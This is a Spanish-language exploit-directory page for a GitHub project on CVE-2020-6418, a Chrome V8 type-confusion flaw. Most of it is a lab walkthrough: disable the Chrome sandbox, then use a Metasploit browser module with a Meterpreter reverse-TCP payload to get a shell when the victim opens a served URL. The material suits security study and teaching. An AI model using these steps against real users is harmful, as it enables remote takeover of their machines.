Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-6418 — Exploit para CVE-2020-6418, una confusión de tipos en V8, que permite ejecución remota de código mediante una página HTML manipulada. Utiliza Metasploit para entregar un payload de shell inversa. | Kitploit
Herramientas/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
Frameworks de ExploitsGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

Exploit para CVE-2020-6418, una confusión de tipos en V8, que permite ejecución remota de código mediante una página HTML manipulada. Utiliza Metasploit para entregar un payload de shell inversa.

Ver Repositorio
119hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-6418

El CVE-2020-6418 trata sobre la confusión de tipos en V8 de Google Chrome. Las versiones afectadas fueron anteriores a 80.0.3987.122. La vulnerabilidad se logra mediante un atacante remoto que accede al shell de un dispositivo objetivo a través de una página HTML manipulada.

Requisitos del Entorno

  1. Google Chrome con versión anterior a 80.0.3987.122 .
Nota: El navegador Google Chrome debe ejecutarse sin sandbox para que el exploit tenga éxito.
  1. Metasploit Framework
  2. SO: Cualquiera

Configuración del Exploit

  1. Google Chrome Versión v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

Configuración de Google Chrome sin sandbox

i) Crear un acceso directo para Google Chrome
ii) Hacer clic en Propiedades > ir a la opción llamada "Destino"
iii) Al final del EXE, dar un espacio e ingresar -no--sandbox
iv) Hacer clic en Aplicar > Aceptar
v) Abrir un nuevo navegador Google Chrome y verá la ventana emergente indicando lo siguiente.

You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

Demostración para Deshabilitar Sandbox

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

Usando Metasploit

Dado que usamos Kali como entorno para llevar a cabo el exploit, Metasploit viene como una herramienta integrada en la distribución. Pero si usas otras distribuciones, necesitamos configurar Metasploit antes de comenzar el exploit.

Consulte la instalación de Metasploit para más información.

Realizando el exploit

i) Iniciando el framework Metasploit

> msfconsole

ii) Encontrar el exploit

> search chrome_js

iii) Usar el exploit disponible de la salida anterior

> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) Proporcionar la dirección IP de SRVHOST

> set SRVHOST <ip address>

v) Proporcionar el objetivo Aquí tenemos dos opciones

  1. Objetivo 0: Para Windows
  2. Objetivo 1: Para MAC
> set Target " Number "

vi) Proporcionar el payload

> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) Para verificar la configuración actual y las opciones habilitadas.

> show options

viii) Para ejecutar el exploit

> run (or) > exploit

ix) Se le proporcionará una URL, que debe copiar en el navegador para que la sesión se active.

x) Una vez que el usuario acceda a la URL, se creará una sesión. Para verificarlo

> show sessions

xi) Usando la sesión, podemos verificar la información del sistema del usuario / ingresar al shell.

> sessions <number>
> shell

Demostración del exploit

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

Descargar herramienta